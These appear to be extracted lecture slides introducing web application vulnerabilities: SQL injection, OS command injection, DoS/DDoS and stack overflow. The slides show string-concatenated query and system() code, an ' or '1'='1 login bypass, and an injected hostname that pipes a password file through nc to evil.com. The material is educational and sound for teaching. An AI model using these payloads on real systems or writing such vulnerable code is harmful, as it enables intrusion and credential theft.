2. - A web application or web app is any software that runs
in a web browser. It is created in a browser-supported
programming language (such as the combination of
JavaScript, HTML and CSS) and relies on a web browser
to render the application.
http://en.wikipedia.org/wiki/Web_application
What is a web application?
3. 1.Injection (SQL Injection)
db.ExecuteReader("select * from users where name='"
+ Request["user"] + "' and password='"
+ Request["password"] + "'");
- Suppose the user request parameter is …' or
'1'='1
- Then the query we execute is … (note that and has
precedence over or)
select * from users where name='' or '1'='1'
4. - Suppose we’re too lazy to perform DNS lookup, so we
resort to the following:
- Suppose the hostname parameter is …
foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
1.Injection (OS Command)
system("nslookup " + Request["hostname"]);
6. - denial-of-service (DoS) or distributed denial-of-service
(DDoS) attack is an attempt to make a machine or
network resource unavailable to its intended users
http://en.wikipedia.org/wiki/Denial-of-service_attack
3.DoS and DDoS
7. - A stack buffer overflow or stack buffer overrun occurs
when a program writes to a memory address on the
program's call stack outside of the intended data
structure, which is usually a fixed-length buffer.
4.Stack Overflow